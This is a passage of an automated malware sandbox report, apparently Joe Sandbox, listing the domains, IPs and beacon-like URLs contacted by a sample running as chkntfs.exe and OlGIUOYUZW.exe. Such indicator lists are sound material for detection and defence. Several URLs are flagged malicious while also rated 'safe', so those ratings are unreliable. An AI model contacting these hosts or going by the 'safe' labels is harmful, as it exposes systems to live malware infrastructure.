                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.png0%Avira URL Cloudsafe
                http://www.rsbi.net0%Avira URL Cloudsafe
                http://www.implantcentre.net0%Avira URL Cloudsafe
                http://www.xingyuanzhibo.net0%Avira URL Cloudsafe
                http://www.easygram.net0%Avira URL Cloudsafe
                http://www.liangmeizhibo.net0%Avira URL Cloudsafe
                http://www.qinglizhibo.net0%Avira URL Cloudsafe
                http://www.kx22368.shop/ca6n/?YFCLW=BxgTctSh&CviT=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU=0%Avira URL Cloudsafe
                http://www.mynewshub.net0%Avira URL Cloudsafe
                http://www.yanyuzhibo.com0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/index.umd.js0%Avira URL Cloudsafe
                http://www.lovevintage.net0%Avira URL Cloudsafe
                http://www.startuptalent.net0%Avira URL Cloudsafe
                http://www.gotogermany.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1d0%Avira URL Cloudsafe
                http://www.hiload.net0%Avira URL Cloudsafe
                http://www.biomedika.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/anva-zilv.png0%Avira URL Cloudsafe
                http://www.happystories.net0%Avira URL Cloudsafe
                http://www.luxbrand.net0%Avira URL Cloudsafe
                http://www.athousandwords.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js0%Avira URL Cloudsafe
                http://www.yanyangzhibo.com0%Avira URL Cloudsafe
                http://www.bodyonline.net0%Avira URL Cloudsafe
                http://www.losbravos.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb0%Avira URL Cloudsafe
                http://www.einpisalpace.shop/pgw3/?YFCLW=BxgTctSh&CviT=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU=0%Avira URL Cloudsafe
                http://www.allprinting.net0%Avira URL Cloudsafe
                http://www.megaos.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/js.js0%Avira URL Cloudsafe
                http://www.methlab.net0%Avira URL Cloudsafe
                http://www.qiyuezhibo.net0%Avira URL Cloudsafe
                http://www.huoyazhibo.net0%Avira URL Cloudsafe
                http://www.miaozhaozhibo.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/bl.js0%Avira URL Cloudsafe
                http://www.naikuaizhibo.com0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js0%Avira URL Cloudsafe
                http://www.electrocat.net0%Avira URL Cloudsafe
                http://www.implantcentre.net/binding0%Avira URL Cloudsafe
                http://www.qilinzhibo.net0%Avira URL Cloudsafe
                http://www.liguizhibo.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/wn9b/?CviT=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&YFCLW=BxgTctSh0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg0%Avira URL Cloudsafe
                http://www.anmozhibo.net0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top/utww/?YFCLW=BxgTctSh&CviT=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8=0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top0%Avira URL Cloudsafe
                http://www.aguardiente.net0%Avira URL Cloudsafe
                http://www.eurosupport.net0%Avira URL Cloudsafe
                http://www.xiapizhibo.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js0%Avira URL Cloudsafe
                http://www.aicaozhibo.net0%Avira URL Cloudsafe
                http://www.kleenair.net0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.laduta.xyz
                		192.64.119.109
                		truetrue
                  		unknown
                  www.babyzhibo.net
                  		192.186.58.31
                  		truetrue
                    		unknown
                    www.potorooqr.lol
                    		127.0.0.1
                    		truefalse
                      		unknown
                      url.gname.net
                      		172.65.235.97
                      		truefalse
                        		high
                        www.einpisalpace.shop
                        		188.114.96.3
                        		truefalse
                          		high
                          www.explorevision.xyz
                          		162.0.236.169
                          		truetrue
                            		unknown
                            www.mzkd6gp5.top
                            		104.21.16.1
                            		truetrue
                              		unknown
                              www.ripbgs.info
                              		47.83.1.90
                              		truetrue
                                		unknown
                                www.0303588a47.buzz
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.kx22368.shop
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.tizzles.tech
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.mzkd6gp5.top/utww/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.einpisalpace.shop/pgw3/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.laduta.xyz/d89m/?CviT=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&YFCLW=BxgTctShtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.babyzhibo.net/wn9b/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.kx22368.shop/ca6n/?YFCLW=BxgTctSh&CviT=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU=true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.einpisalpace.shop/pgw3/?YFCLW=BxgTctSh&CviT=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU=true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.babyzhibo.net/wn9b/?CviT=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&YFCLW=BxgTctShtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.mzkd6gp5.top/utww/?YFCLW=BxgTctSh&CviT=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8=true
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.12377.cn/chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://beian.miit.gov.cn/#/Integrated/indexchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/chrome_newtabchkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.jiuyuezhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.maituzhibo.comchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.pngchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/ac/?q=chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://push.zhanzhang.baidu.com/push.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                http://www.oshwal.netOlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.zhonglangzhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.liuhuazhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.liufangzhibo.comchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.qimiaozhibo.comchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.elecsa.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.medicalink.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.lovemarketing.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.yundouzhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.maskmakers.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.xiaomiaozhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://einpisalpace.shop/OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000002DA8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://laduta.xyz/d89m?CviT=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKlOlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000002C16000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.wuyezhibo.comchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.banditi.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.eventsmedia.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.68markavenue.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://white.anva.org.cn/chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.nuoyunzhibo.comchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.welovebeauty.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.agrobazar.netOlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.hairdeluxe.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.legalvideos.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.xunaizhibo.com/bindingchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.perfectpint.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://zzlz.gsxt.gov.cn/chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.huayuzhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.theflowerpot.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.babyzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.legalstrategy.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.wuyezhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.chuncaozhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.babyzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.pngOlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.rsbi.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.implantcentre.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.xingyuanzhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.easygram.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.qinglizhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.liangmeizhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.yanyuzhibo.comchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.mynewshub.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.babyzhibo.net/template/news/wandoujia/static/js/index.umd.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.startuptalent.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.lovevintage.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.gotogermany.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.hiload.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.babyzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1dchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
